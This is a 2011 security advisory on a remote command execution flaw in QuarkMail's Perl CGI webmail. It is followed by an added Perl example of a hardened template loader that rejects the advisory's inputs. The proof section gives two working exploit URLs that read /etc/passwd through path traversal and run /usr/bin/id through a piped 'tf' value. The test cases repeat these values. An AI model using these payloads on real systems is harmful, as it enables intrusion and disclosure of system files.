QUIK email (QuarkMail) remote command execution vulnerability and fix

ID MYHACK58:62201129728
Type myhack58
Reporter Anonymous
Modified 2011-03-15T00:00:00


Vulnerability description: QUIK email (QuarkMail) is an e-mail system launched by Beijing Xiong Zhi weiye Science and Technology Company and is widely used as an email solution in various fields. Its webmail component is written as Perl CGI, but 80sec found a major security vulnerability in the system that lets remote users of the mail system execute arbitrary commands with the identity of the current process, and from there go on to control the host or the system.

Vendor: http://www.ipmotor.com/

Vulnerability analysis: QuarkMail mistakenly uses Perl's open function to open files for templates and other functions, but does not effectively filter the parameters passed in by the user, resulting in a command execution vulnerability.

Vulnerability proof: after logging in to the system, access the following URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../etc/passwd%00&id=2&sort=0&read_flag=yes

This returns the system account file. Then access the following URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

Here /usr/bin/id is executed when the file is opened, and the result is returned. A user can use a sequence of such operations to obtain full access rights to the system.

Solution: please wait for the official patch.
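
The root cause named in the analysis, shown as an added example that is not QuarkMail's code or part of the original advisory: a hardened template loader that allowlists the name and uses three-argument open. The function name load_template, the sample file read.tpl and the template directory are hypothetical, and the vulnerable call in the comment is an assumed shape, since the advisory does not show the source.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Pattern the analysis describes (assumed shape, not QuarkMail source):
#     open(FH, "$template_dir/$tf");
# Two-argument open takes the mode from the string itself, so a value
# ending in "|" is run as a command, and "../" walks out of the directory.

# Hardened loader: allowlist the name, then use three-argument open.
sub load_template {
    my ($template_dir, $name) = @_;
    return (undef, 'missing name') unless defined $name && length $name;
    # Letters, digits, "_", "-", "." only: rejects "/", "|", NUL, spaces.
    return (undef, 'illegal characters')
        unless $name =~ /\A[A-Za-z0-9_.-]{1,64}\z/;
    return (undef, 'dot-only name') if $name =~ /\A\.+\z/;
    my $path = File::Spec->catfile($template_dir, $name);
    # Explicit "<" mode: the path is only ever a file name to read.
    open(my $fh, '<', $path) or return (undef, "cannot open: $!");
    local $/;    # slurp the whole file
    my $body = <$fh>;
    close $fh;
    return ($body, undef);
}

# Constructed test data: a temporary template directory with one file.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', File::Spec->catfile($dir, 'read.tpl')) or die $!;
print {$out} "<html>message view</html>\n";
close $out;

# Constructed inputs mirroring the two "tf" values in the proof above.
my @cases = (
    'read.tpl',
    "../../../../../../../etc/passwd\0",
    "../../../../../../../usr/bin/id|\0",
);
for my $tf (@cases) {
    my ($body, $err) = load_template($dir, $tf);
    (my $shown = $tf) =~ s/\0/\\0/g;    # make the NUL byte visible
    printf "%-40s => %s\n", $shown,
        defined $body ? 'served' : "rejected ($err)";
}
```

Only read.tpl is served; both values from the proof are rejected by the allowlist before any open call is made.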